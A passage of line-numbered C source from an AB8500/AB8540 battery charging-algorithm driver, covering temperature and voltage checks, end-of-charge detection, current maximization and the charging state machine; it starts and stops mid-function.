1628 abx500_chargalg_state_to(di, STATE_MAINTENANCE_B_INIT);
1629 }
1630 break;
1631
1632 case STATE_MAINTENANCE_B_INIT:
1633 abx500_chargalg_start_maintenance_timer(di,
1634 di->bm->bat_type[
1635 di->bm->batt_id].maint_b_chg_timer_h);
1636 abx500_chargalg_start_charging(di,
1637 di->bm->bat_type[
1638 di->bm->batt_id].maint_b_vol_lvl,
1639 di->bm->bat_type[
1640 di->bm->batt_id].maint_b_cur_lvl);
1641 abx500_chargalg_state_to(di, STATE_MAINTENANCE_B);
1642 power_supply_changed(di->chargalg_psy);
1643 /* Intentional fallthrough*/
1644
1645 case STATE_MAINTENANCE_B:
1646 if (di->events.maintenance_timer_expired) {
1647 abx500_chargalg_stop_maintenance_timer(di);
1648 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1649 }
1650 break;
1651
1652 case STATE_TEMP_LOWHIGH_INIT:
1653 abx500_chargalg_start_charging(di,
1654 di->bm->bat_type[
1655 di->bm->batt_id].low_high_vol_lvl,
1656 di->bm->bat_type[
1657 di->bm->batt_id].low_high_cur_lvl);
1658 abx500_chargalg_stop_maintenance_timer(di);
1659 di->charge_status = POWER_SUPPLY_STATUS_CHARGING;
1660 abx500_chargalg_state_to(di, STATE_TEMP_LOWHIGH);
1661 power_supply_changed(di->chargalg_psy);
1662 /* Intentional fallthrough */
1663
1664 case STATE_TEMP_LOWHIGH:
1665 if (!di->events.btemp_lowhigh)
1666 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1667 break;
1668
1669 case STATE_WD_EXPIRED_INIT:
1670 abx500_chargalg_stop_charging(di);
1671 abx500_chargalg_state_to(di, STATE_WD_EXPIRED);
1672 /* Intentional fallthrough */
1673
1674 case STATE_WD_EXPIRED:
1675 if (!di->events.ac_wd_expired &&
1676 !di->events.usb_wd_expired)
1677 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1678 break;
1679
1680 case STATE_TEMP_UNDEROVER_INIT:
1681 abx500_chargalg_stop_charging(di);
1682 abx500_chargalg_state_to(di, STATE_TEMP_UNDEROVER);
1683 /* Intentional fallthrough */
1684
1685 case STATE_TEMP_UNDEROVER:
1686 if (!di->events.btemp_underover)
1687 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1688 break;
1689 }
1690
1691 /* Start charging directly if the new state is a charge state */
1692 if (di->charge_state == STATE_NORMAL_INIT ||
1693 di->charge_state == STATE_MAINTENANCE_A_INIT ||
1694 di->charge_state == STATE_MAINTENANCE_B_INIT)
1695 queue_work(di->chargalg_wq, &di->chargalg_work);
1696 }
1697
1698 /**
1699 * abx500_chargalg_periodic_work() - Periodic work for the algorithm
1700 * @work: pointer to the work_struct structure
1701 *
1702 * Work queue function for the charging algorithm
1703 */
1704 static void abx500_chargalg_periodic_work(struct work_struct *work)
1705 {
1706 struct abx500_chargalg *di = container_of(work,
1707 struct abx500_chargalg, chargalg_periodic_work.work);
1708
1709 abx500_chargalg_algorithm(di);
1710
1711 /*
1712 * If a charger is connected then the battery has to be monitored
1713 * frequently, else the work can be delayed.
1714 */
1715 if (di->chg_info.conn_chg)
1716 queue_delayed_work(di->chargalg_wq,
1717 &di->chargalg_periodic_work,
1718 di->bm->interval_charging * HZ);
1719 else
1720 queue_delayed_work(di->chargalg_wq,
1721 &di->chargalg_periodic_work,
1722 di->bm->interval_not_charging * HZ);
1723 }
1724
1725 /**
1726 * abx500_chargalg_wd_work() - periodic work to kick the charger watchdog
1727 * @work: pointer to the work_struct structure
1728 *
1729 * Work queue function for kicking the charger watchdog
1730 */
1731 static void abx500_chargalg_wd_work(struct work_struct *work)
1732 {
1733 int ret;
1734 struct abx500_chargalg *di = container_of(work,
1735 struct abx500_chargalg, chargalg_wd_work.work);
1736
1737 dev_dbg(di->dev, "abx500_chargalg_wd_work\n");
1738
1739 ret = abx500_chargalg_kick_watchdog(di);
1740 if (ret < 0)
1741 dev_err(di->dev, "failed to kick watchdog\n");
1742
1743 queue_delayed_work(di->chargalg_wq,
1744 &di->chargalg_wd_work, CHG_WD_INTERVAL);
1745 }
1746
1747 /**
1748 * abx500_chargalg_work() - Work to run the charging algorithm instantly
1749 * @work: pointer to the work_struct structure
1750 *
1751 * Work queue function for calling the charging algorithm
1752 */
1753 static void abx500_chargalg_work(struct work_struct *work)
1754 {
1755 struct abx500_chargalg *di = container_of(work,
1756 struct abx500_chargalg, chargalg_work);
1757
1758 abx500_chargalg_algorithm(di);
1759 }
1760
1761 /**
1762 * abx500_chargalg_get_property() - get the chargalg properties
1763 * @psy: pointer to the power_supply structure
1764 * @psp: pointer to the power_supply_property structure
1765 * @val: pointer to the power_supply_propval union
1766 *
1767 * This function gets called when an application tries to get the
1768 * chargalg properties by reading the sysfs files.
1769 * status: charging/discharging/full/unknown
1770 * health: health of the battery
1771 * Returns error code in case of failure else 0 on success
1772 */
1773 static int abx500_chargalg_get_property(struct power_supply *psy,
1774 enum power_supply_property psp,
1775 union power_supply_propval *val)
1776 {
1777 struct abx500_chargalg *di = power_supply_get_drvdata(psy);
1778
1779 switch (psp) {
1780 case POWER_SUPPLY_PROP_STATUS:
1781 val->intval = di->charge_status;
1782 break;
1783 case POWER_SUPPLY_PROP_HEALTH:
1784 if (di->events.batt_ovv) {
1785 val->intval = POWER_SUPPLY_HEALTH_OVERVOLTAGE;
1786 } else if (di->events.btemp_underover) {
1787 if (di->batt_data.temp <= di->bm->temp_under)
1788 val->intval = POWER_SUPPLY_HEALTH_COLD;
1789 else
1790 val->intval = POWER_SUPPLY_HEALTH_OVERHEAT;
1791 } else if (di->charge_state == STATE_SAFETY_TIMER_EXPIRED ||
1792 di->charge_state == STATE_SAFETY_TIMER_EXPIRED_INIT) {
1793 val->intval = POWER_SUPPLY_HEALTH_UNSPEC_FAILURE;
1794 } else {
1795 val->intval = POWER_SUPPLY_HEALTH_GOOD;
1796 }
1797 break;
1798 default:
1799 return -EINVAL;
1800 }
1801 return 0;
1802 }
1803
1804 /* Exposure to the sysfs interface */
1805
1806 static ssize_t abx500_chargalg_curr_step_show(struct abx500_chargalg *di,
1807 char *buf)
1808 {
1809 return sprintf(buf, "%d\n", di->curr_status.curr_step);
1810 }
1811
1812 static ssize_t abx500_chargalg_curr_step_store(struct abx500_chargalg *di,
1813 const char *buf, size_t length)
1814 {
1815 long int param;
1816 int ret;
1817
1818 ret = kstrtol(buf, 10, ¶m);
1819 if (ret < 0)
1820 return ret;
1821
1822 di->curr_status.curr_step = param;
1823 if (di->curr_status.curr_step >= CHARGALG_CURR_STEP_LOW &&
1824 di->curr_status.curr_step <= CHARGALG_CURR_STEP_HIGH) {
1825 di->curr_status.curr_step_change = true;
1826 queue_work(di->chargalg_wq, &di->chargalg_work);
1827 } else
1828 dev_info(di->dev, "Wrong current step\n"
1829 "Enter 0. Disable AC/USB Charging\n"
1830 "1--100. Set AC/USB charging current step\n"
1831 "100. Enable AC/USB Charging\n");
1832
1833 return strlen(buf);
1834 }
1835
1836
1837 static ssize_t abx500_chargalg_en_show(struct abx500_chargalg *di,
1838 char *buf)
1839 {
1840 return sprintf(buf, "%d\n",
1841 di->susp_status.ac_suspended &&
1842 di->susp_status.usb_suspended);
1843 }
1844
1845 static ssize_t abx500_chargalg_en_store(struct abx500_chargalg *di,
1846 const char *buf, size_t length)
1847 {
1848 long int param;
1849 int ac_usb;
1850 int ret;
1851
1852 ret = kstrtol(buf, 10, ¶m);
1853 if (ret < 0)
1854 return ret;
1855
1856 ac_usb = param;
1857 switch (ac_usb) {
1858 case 0:
1859 /* Disable charging */
1860 di->susp_status.ac_suspended = true;
1861 di->susp_status.usb_suspended = true;
1862 di->susp_status.suspended_change = true;
1863 /* Trigger a state change */
1864 queue_work(di->chargalg_wq,
1865 &di->chargalg_work);
1866 break;
1867 case 1:
1868 /* Enable AC Charging */
1869 di->susp_status.ac_suspended = false;
1870 di->susp_status.suspended_change = true;
1871 /* Trigger a state change */
1872 queue_work(di->chargalg_wq,
1873 &di->chargalg_work);
1874 break;
1875 case 2:
1876 /* Enable USB charging */
1877 di->susp_status.usb_suspended = false;
1878 di->susp_status.suspended_change = true;
1879 /* Trigger a state change */
1880 queue_work(di->chargalg_wq,
1881 &di->chargalg_work);
1882 break;
1883 default:
1884 dev_info(di->dev, "Wrong input\n"
1885 "Enter 0. Disable AC/USB Charging\n"
1886 "1. Enable AC charging\n"
1887 "2. Enable USB Charging\n");
1888 };
1889 return strlen(buf);
1890 }
1891
1892 static struct abx500_chargalg_sysfs_entry abx500_chargalg_en_charger =
1893 __ATTR(chargalg, 0644, abx500_chargalg_en_show,
1894 abx500_chargalg_en_store);
1895
1896 static struct abx500_chargalg_sysfs_entry abx500_chargalg_curr_step =
1897 __ATTR(chargalg_curr_step, 0644, abx500_chargalg_curr_step_show,
1898 abx500_chargalg_curr_step_store);
1899
1900 static ssize_t abx500_chargalg_sysfs_show(struct kobject *kobj,
1901 struct attribute *attr, char *buf)
1902 {
1903 struct abx500_chargalg_sysfs_entry *entry = container_of(attr,
1904 struct abx500_chargalg_sysfs_entry, attr);
1905
1906 struct abx500_chargalg *di = container_of(kobj,
1907 struct abx500_chargalg, chargalg_kobject);
1908
1909 if (!entry->show)
1910 return -EIO;
1911
1912 return entry->show(di, buf);
1913 }
1914
1915 static ssize_t abx500_chargalg_sysfs_charger(struct kobject *kobj,
1916 struct attribute *attr, const char *buf, size_t length)
1917 {
1918 struct abx500_chargalg_sysfs_entry *entry = container_of(attr,
1919 struct abx500_chargalg_sysfs_entry, attr);
1920
1921 struct abx500_chargalg *di = container_of(kobj,
1922 struct abx500_chargalg, chargalg_kobject);
1923
1924 if (!entry->store)
1925 return -EIO;
1926
1927 return entry->store(di, buf, length);
1928 }
1929
1930 static struct attribute *abx500_chargalg_chg[] = {
1931 &abx500_chargalg_en_charger.attr,
1932 &abx500_chargalg_curr_step.attr,
1933 NULL,
1934 };
1935
1936 static const struct sysfs_ops abx500_chargalg_sysfs_ops = {
1937 .show = abx500_chargalg_sysfs_show,
1938 .store = abx500_chargalg_sysfs_charger,
1939 };
1940
1941 static struct kobj_type abx500_chargalg_ktype = {
1942 .sysfs_ops = &abx500_chargalg_sysfs_ops,
1943 .default_attrs = abx500_chargalg_chg,
1944 };
1945
1946 /**
1947 * abx500_chargalg_sysfs_exit() - de-init of sysfs entry
1948 * @di: pointer to the struct abx500_chargalg
1949 *
1950 * This function removes the entry in sysfs.
1951 */
1952 static void abx500_chargalg_sysfs_exit(struct abx500_chargalg *di)
1953 {
1954 kobject_del(&di->chargalg_kobject);
1955 }
1956
1957 /**
1958 * abx500_chargalg_sysfs_init() - init of sysfs entry
1959 * @di: pointer to the struct abx500_chargalg
1960 *
1961 * This function adds an entry in sysfs.
1962 * Returns error code in case of failure else 0(on success)
1963 */
1964 static int abx500_chargalg_sysfs_init(struct abx500_chargalg *di)
1965 {
1966 int ret = 0;
1967
1968 ret = kobject_init_and_add(&di->chargalg_kobject,
1969 &abx500_chargalg_ktype,
1970 NULL, "abx500_chargalg");
1971 if (ret < 0)
1972 dev_err(di->dev, "failed to create sysfs entry\n");
1973
1974 return ret;
1975 }
1976 /* Exposure to the sysfs interface <<END>> */
1977
1978 #if defined(CONFIG_PM)
1979 static int abx500_chargalg_resume(struct platform_device *pdev)
1980 {
1981 struct abx500_chargalg *di = platform_get_drvdata(pdev);
1982
1983 /* Kick charger watchdog if charging (any charger online) */
1984 if (di->chg_info.online_chg)
1985 queue_delayed_work(di->chargalg_wq, &di->chargalg_wd_work, 0);
1986
1987 /*
1988 * Run the charging algorithm directly to be sure we don't
1989 * do it too seldom
1990 */
1991 queue_delayed_work(di->chargalg_wq, &di->chargalg_periodic_work, 0);
1992
1993 return 0;
1994 }
1995
1996 static int abx500_chargalg_suspend(struct platform_device *pdev,
1997 pm_message_t state)
1998 {
1999 struct abx500_chargalg *di = platform_get_drvdata(pdev);
2000
2001 if (di->chg_info.online_chg)
2002 cancel_delayed_work_sync(&di->chargalg_wd_work);
2003
2004 cancel_delayed_work_sync(&di->chargalg_periodic_work);
2005
2006 return 0;
2007 }
2008 #else
2009 #define abx500_chargalg_suspend NULL
2010 #define abx500_chargalg_resume NULL
2011 #endif
2012
2013 static int abx500_chargalg_remove(struct platform_device *pdev)
2014 {
2015 struct abx500_chargalg *di = platform_get_drvdata(pdev);
2016
2017 /* sysfs interface to enable/disbale charging from user space */
2018 abx500_chargalg_sysfs_exit(di);
2019
2020 hrtimer_cancel(&di->safety_timer);
2021 hrtimer_cancel(&di->maintenance_timer);
2022
2023 cancel_delayed_work_sync(&di->chargalg_periodic_work);
2024 cancel_delayed_work_sync(&di->chargalg_wd_work);
2025 cancel_work_sync(&di->chargalg_work);
2026
2027 /* Delete the work queue */
2028 destroy_workqueue(di->chargalg_wq);
2029
2030 power_supply_unregister(di->chargalg_psy);
2031
2032 return 0;
2033 }
2034
2035 static char *supply_interface[] = {
2036 "ab8500_fg",
2037 };
2038
2039 static const struct power_supply_desc abx500_chargalg_desc = {
2040 .name = "abx500_chargalg",
2041 .type = POWER_SUPPLY_TYPE_BATTERY,
2042 .properties = abx500_chargalg_props,
2043 .num_properties = ARRAY_SIZE(abx500_chargalg_props),
2044 .get_property = abx500_chargalg_get_property,
2045 .external_power_changed = abx500_chargalg_external_power_changed,
2046 };
2047
2048 static int abx500_chargalg_probe(struct platform_device *pdev)
2049 {
2050 struct device_node *np = pdev->dev.of_node;
2051 struct abx500_bm_data *plat = pdev->dev.platform_data;
2052 struct power_supply_config psy_cfg = {};
2053 struct abx500_chargalg *di;
2054 int ret = 0;
2055
2056 di = devm_kzalloc(&pdev->dev, sizeof(*di), GFP_KERNEL);
2057 if (!di) {
2058 dev_err(&pdev->dev, "%s no mem for ab8500_chargalg\n", __func__);
2059 return -ENOMEM;
2060 }
2061
2062 if (!plat) {
2063 dev_err(&pdev->dev, "no battery management data supplied\n");
2064 return -EINVAL;
2065 }
2066 di->bm = plat;
2067
2068 if (np) {
2069 ret = ab8500_bm_of_probe(&pdev->dev, np, di->bm);
2070 if (ret) {
2071 dev_err(&pdev->dev, "failed to get battery information\n");
2072 return ret;
2073 }
2074 }
2075
2076 /* get device struct and parent */
2077 di->dev = &pdev->dev;
2078 di->parent = dev_get_drvdata(pdev->dev.parent);
2079
2080 psy_cfg.supplied_to = supply_interface;
2081 psy_cfg.num_supplicants = ARRAY_SIZE(supply_interface);
2082 psy_cfg.drv_data = di;
2083
2084 /* Initilialize safety timer */
2085 hrtimer_init(&di->safety_timer, CLOCK_REALTIME, HRTIMER_MODE_ABS);
2086 di->safety_timer.function = abx500_chargalg_safety_timer_expired;
2087
2088 /* Initilialize maintenance timer */
2089 hrtimer_init(&di->maintenance_timer, CLOCK_REALTIME, HRTIMER_MODE_ABS);
2090 di->maintenance_timer.function =
2091 abx500_chargalg_maintenance_timer_expired;
2092
2093 /* Create a work queue for the chargalg */
2094 di->chargalg_wq =
2095 create_singlethread_workqueue("abx500_chargalg_wq");
2096 if (di->chargalg_wq == NULL) {
2097 dev_err(di->dev, "failed to create work queue\n");
2098 return -ENOMEM;
2099 }
2100
2101 /* Init work for chargalg */
2102 INIT_DEFERRABLE_WORK(&di->chargalg_periodic_work,
2103 abx500_chargalg_periodic_work);
2104 INIT_DEFERRABLE_WORK(&di->chargalg_wd_work,
2105 abx500_chargalg_wd_work);
2106
2107 /* Init work for chargalg */
2108 INIT_WORK(&di->chargalg_work, abx500_chargalg_work);
2109
2110 /* To detect charger at startup */
2111 di->chg_info.prev_conn_chg = -1;
2112
2113 /* Register chargalg power supply class */
2114 di->chargalg_psy = power_supply_register(di->dev, &abx500_chargalg_desc,
2115 &psy_cfg);
2116 if (IS_ERR(di->chargalg_psy)) {
2117 dev_err(di->dev, "failed to register chargalg psy\n");
2118 ret = PTR_ERR(di->chargalg_psy);
2119 goto free_chargalg_wq;
2120 }
2121
2122 platform_set_drvdata(pdev, di);
2123
2124 /* sysfs interface to enable/disable charging from user space */
2125 ret = abx500_chargalg_sysfs_init(di);
2126 if (ret) {
2127 dev_err(di->dev, "failed to create sysfs entry\n");
2128 goto free_psy;
2129 }
2130 di->curr_status.curr_step = CHARGALG_CURR_STEP_HIGH;
2131
2132 /* Run the charging algorithm */
2133 queue_delayed_work(di->chargalg_wq, &di->chargalg_periodic_work, 0);
2134
2135 dev_info(di->dev, "probe success\n");
2136 return ret;
2137
2138 free_psy:
2139 power_supply_unregister(di->chargalg_psy);
2140 free_chargalg_wq:
2141 destroy_workqueue(di->chargalg_wq);
2142 return ret;
2143 }
2144
2145 static const struct of_device_id ab8500_chargalg_match[] = {
2146 { .compatible = "stericsson,ab8500-chargalg", },
2147 { },
2148 };
2149
2150 static struct platform_driver abx500_chargalg_driver = {
2151 .probe = abx500_chargalg_probe,
2152 .remove = abx500_chargalg_remove,
2153 .suspend = abx500_chargalg_suspend,
2154 .resume = abx500_chargalg_resume,
2155 .driver = {
2156 .name = "ab8500-chargalg",
2157 .of_match_table = ab8500_chargalg_match,
2158 },
2159 };
2160
2161 module_platform_driver(abx500_chargalg_driver);
2162
2163 MODULE_LICENSE("GPL v2");
2164 MODULE_AUTHOR("Johan Palsson, Karl Komierowski");
2165 MODULE_ALIAS("platform:abx500-chargalg");
2166 MODULE_DESCRIPTION("abx500 battery charging algorithm");
2167
This page was automatically generated by LXR 0.3.1 (source). • Linux is a registered trademark of Linus Torvalds • Contact us
|
__label__pos
| 0.989783 |
Evaluate each expression, Algebra
-16 = n + 1
Posted Date: 9/30/2012 12:31:07 PM | Location : United States
Related Discussions:- Evaluate each expression, Assignment Help, Ask Question on Evaluate each expression, Get Answer, Expert's Help, Evaluate each expression Discussions
Write discussion on Evaluate each expression
Your posts are moderated
Related Questions
why is the slope of two perpendicular line a negative reciprocal
use M(t)434e^-.08t to find the approximate the number of continuously serving members in each year
Fact Following any system of equations there are accurately three possibilities for the solution. 1. There will not be a solution. 2. There will be just one solution.
five years ago,you bought a house for $151,000, with a down payment of $30,000, which meant you took out a loan for $121,000. Your interest rate was 5.75% fixed. You would like t
write the following function x^2-2x-1 in the form of y=a(x-h)^2+k
#questionSolve the system graphically. If the system has an infinite number of solutions, use set builder notation to write the solution set. If the system has no solution, state t
I am stuck on solving this problem a^1/2/a^2. Can anyone help?
A mountain has an elevation of 19,389 feet in 1918, the glacier on this peak covered 4 acres. By 2003 this glacier had melted to 1 acre. What was the yearlyrate of change and what
a farmer has a garden with 2 sides at right angles and the third side is 423ft.long.find the perimeter of the garden. if the angle between the shortest and the longest side is 58''
|
__label__pos
| 0.987881 |
DGtal 0.9.3
TrueDigitalSurfaceLocalEstimator.ih
1 /**
2 * This program is free software: you can redistribute it and/or modify
3 * it under the terms of the GNU Lesser General Public License as
4 * published by the Free Software Foundation, either version 3 of the
5 * License, or (at your option) any later version.
6 *
7 * This program is distributed in the hope that it will be useful,
8 * but WITHOUT ANY WARRANTY; without even the implied warranty of
9 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
10 * GNU General Public License for more details.
11 *
12 * You should have received a copy of the GNU General Public License
13 * along with this program. If not, see <http://www.gnu.org/licenses/>.
14 *
15 **/
16
17 /**
18 * @file TrueDigitalSurfaceLocalEstimator.ih
19 * @author Jacques-Olivier Lachaud (\c [email protected] )
20 * Laboratory of Mathematics (CNRS, UMR 5127), University of Savoie, France
21 *
22 * @date 2014/02/14
23 *
24 * Implementation of inline methods defined in TrueDigitalSurfaceLocalEstimator.h
25 *
26 * This file is part of the DGtal library.
27 */
28
29
30 //////////////////////////////////////////////////////////////////////////////
31 #include <cstdlib>
32 //////////////////////////////////////////////////////////////////////////////
33
34 ///////////////////////////////////////////////////////////////////////////////
35 // IMPLEMENTATION of inline methods.
36 ///////////////////////////////////////////////////////////////////////////////
37
38 ///////////////////////////////////////////////////////////////////////////////
39 // ----------------------- Standard services ------------------------------
40
41 //-----------------------------------------------------------------------------
42 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
43 inline
44 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
45 ~TrueDigitalSurfaceLocalEstimator()
46 {
47 }
48 //-----------------------------------------------------------------------------
49 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
50 inline
51 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
52 TrueDigitalSurfaceLocalEstimator()
53 : myKSpace( 0 ), myFct( 0 ), myEmbedder(),
54 myShape( 0 ), myH( 1.0 ),
55 myMaxIter( 0 ), myAccuracy( 0.1 ), myGamma( 0.01 )
56 {
57 }
58 //-----------------------------------------------------------------------------
59 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
60 inline
61 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
62 TrueDigitalSurfaceLocalEstimator( const Self& other )
63 : myKSpace( other.myKSpace ), myFct( other.myFct ), myEmbedder( other.myEmbedder ),
64 myShape( other.myShape ), myH( other.myH ),
65 myMaxIter( other.myMaxIter ), myAccuracy( other.myAccuracy ), myGamma( other.myGamma )
66 {
67 }
68 //-----------------------------------------------------------------------------
69 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
70 inline
71 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>&
72 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
73 operator=( const Self& other )
74 {
75 if ( this != &other )
76 {
77 myKSpace = other.myKSpace;
78 myFct = other.myFct;
79 myEmbedder = other.myEmbedder;
80 myShape = other.myShape;
81 myH = other.myH;
82 myMaxIter = other.myMaxIter;
83 myAccuracy = other.myAccuracy;
84 myGamma = other.myGamma;
85 }
86 return *this;
87 }
88
89 //-----------------------------------------------------------------------------
90 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
91 inline
92 typename DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::Scalar
93 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
94 h() const
95 {
96 return myH;
97 }
98 //-----------------------------------------------------------------------------
99 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
100 inline
101 void
102 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
103 attach( ConstAlias<Shape> aShape )
104 {
105 myShape = aShape;
106 if ( ( myShape != 0 ) && ( myFct != 0 ) ) myFct->attach( myShape );
107 }
108 //-----------------------------------------------------------------------------
109 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
110 inline
111 void
112 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
113 setParams( ConstAlias<KSpace> ks,
114 Clone<GeometricFunctor> fct,
115 const int maxIter,
116 const Scalar accuracy,
117 const Scalar gamma )
118 {
119 myKSpace = ks;
120 myFct = fct;
121 if ( ( myShape != 0 ) && ( myFct != 0 ) ) myFct->attach( myShape );
122 myEmbedder = SCellEmbedder( *myKSpace );
123 myMaxIter = maxIter;
124 myAccuracy = accuracy;
125 myGamma = gamma;
126 }
127 //-----------------------------------------------------------------------------
128 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
129 template <typename SurfelConstIterator>
130 inline
131 void
132 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
133 init( const Scalar _h,
134 SurfelConstIterator /* itb */,
135 SurfelConstIterator /* ite */ )
136 {
137 myH = _h;
138 }
139
140 //-----------------------------------------------------------------------------
141 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
142 template <typename SurfelConstIterator>
143 inline
144 typename DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::Quantity
145 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
146 eval( SurfelConstIterator it ) const
147 {
148 ASSERT( isValid() );
149 BOOST_CONCEPT_ASSERT(( boost::InputIterator<SurfelConstIterator> ));
150 return myFct->operator()( embed( *it ) );
151 }
152 //-----------------------------------------------------------------------------
153 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
154 template <typename OutputIterator, typename SurfelConstIterator>
155 inline
156 OutputIterator
157 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
158 eval( SurfelConstIterator itb,
159 SurfelConstIterator ite,
160 OutputIterator result ) const
161 {
162 BOOST_CONCEPT_ASSERT(( boost::InputIterator<SurfelConstIterator> ));
163 BOOST_CONCEPT_ASSERT(( boost::OutputIterator<OutputIterator,Quantity> ));
164 for ( ; itb != ite; ++itb )
165 *result++ = this->eval( itb );
166 return result;
167 }
168 //-----------------------------------------------------------------------------
169 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
170 inline
171 typename DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::RealPoint
172 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
173 embed( Surfel surfel ) const
174 {
175 ASSERT( isValid() );
176 RealPoint p = myEmbedder( surfel );
177 p *= myH;
178 return ( myMaxIter > 0 )
179 ? myShape->nearestPoint( p, myAccuracy, myMaxIter, myGamma )
180 : p;
181 }
182
183 ///////////////////////////////////////////////////////////////////////////////
184 // Interface - public :
185
186 /**
187 * Writes/Displays the object on an output stream.
188 * @param out the output stream where the object is written.
189 */
190 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
191 inline
192 void
193 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
194 selfDisplay ( std::ostream & out ) const
195 {
196 out << "[TrueDigitalSurfaceLocalEstimator]";
197 }
198
199 /**
200 * Checks the validity/consistency of the object.
201 * @return 'true' if the object is valid, 'false' otherwise.
202 */
203 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
204 inline
205 bool
206 DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
207 isValid() const
208 {
209 return ( myKSpace != 0 )
210 && ( myFct != 0 )
211 && ( myShape != 0 )
212 && ( myEmbedder.isValid() );
213 }
214
215
216
217 ///////////////////////////////////////////////////////////////////////////////
218 // Implementation of inline functions //
219
220 template <typename TKSpace, typename TShape, typename TGeometricFunctor>
221 inline
222 std::ostream&
223 DGtal::operator<< ( std::ostream & out,
224 const TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor> & object )
225 {
226 object.selfDisplay( out );
227 return out;
228 }
229
230 // //
231 ///////////////////////////////////////////////////////////////////////////////
232
233
|
__label__pos
| 0.926531 |
Sign up ×
Mathematics Stack Exchange is a question and answer site for people studying math at any level and professionals in related fields. It's 100% free, no registration required.
I have a markov chain with transition matrix below,
$$\begin{bmatrix} 1-q & q & & & \\ 1-q & 0 & q & & \\ & 1-q & 0 & q & \\ & & 1-q & 0 & q \\ & & & \ddots & \ddots & \ddots \end{bmatrix}$$ and I am asked to compute the stationary distribution for $q<\frac{1}{2}$. Using $\pi P =\pi$, I get that $\pi_n =\pi_0\left(\frac{q}{1-q}\right)^n$ and $\sum_{n=0}^\infty \pi_n = 1$.
Thus I get
$\pi_0\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n=1 \\ \pi_0=\frac{1}{\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n} \\ \text{thus } \pi_n = \frac{\left(\frac{q}{1-q}\right)^n}{\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n}$
But it doesnt seem to be simplified. Is there anything else I can do to simplify $\pi_0=\frac{1}{\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n}$? And thus simplify $\pi_n$.
share|cite|improve this question
1
Since $q < \frac{1}{2}$, $\gamma = \frac{q}{1-q} < 1$, so the sum in the denominator is a geometric series. – Neal May 7 '12 at 19:49
Thanks @Neal, so I get that $\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n =\frac{q}{1-2q}$, hence $\pi_0 = \frac{1-2q}{2q}$? – Richard May 7 '12 at 20:07
I get $\sum\gamma^n = \frac{1}{1-\gamma} = \frac{1}{1-\frac{q}{1-q}} = \frac{1-q}{1-2q}$ so $\pi_0 = \frac{1-2q}{1-q}$. – Neal May 10 '12 at 15:15
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Browse other questions tagged or ask your own question.
|
__label__pos
| 0.99814 |
1. 9.3 Web sockets
1. 9.3.1 Introduction
2. 9.3.2 The WebSocket interface
3. 9.3.3 Feedback from the protocol
4. 9.3.4 Ping and Pong frames
5. 9.3.5 The CloseEvent interface
6. 9.3.6 Garbage collection
9.3 Web sockets
Support: websocketsChrome for Android 74+Chrome 16+iOS Safari 6.0+Firefox 11+UC Browser for Android 11.8+Samsung Internet 4+IE 10+Safari 7+Edge 12+Opera Mini NoneOpera 12.1+Android Browser 4.4+
Source: caniuse.com
9.3.1 Introduction
This section is non-normative.
To enable Web applications to maintain bidirectional communications with server-side processes, this specification introduces the WebSocket interface.
This interface does not allow for raw access to the underlying network. For example, this interface could not be used to implement an IRC client without proxying messages through a custom server.
9.3.2 The WebSocket interface
enum BinaryType { "blob", "arraybuffer" };
[Constructor(USVString url, optional (DOMString or sequence<DOMString>) protocols = []), Exposed=(Window,Worker)]
interface WebSocket : EventTarget {
readonly attribute USVString url;
// ready state
const unsigned short CONNECTING = 0;
const unsigned short OPEN = 1;
const unsigned short CLOSING = 2;
const unsigned short CLOSED = 3;
readonly attribute unsigned short readyState;
readonly attribute unsigned long long bufferedAmount;
// networking
attribute EventHandler onopen;
attribute EventHandler onerror;
attribute EventHandler onclose;
readonly attribute DOMString extensions;
readonly attribute DOMString protocol;
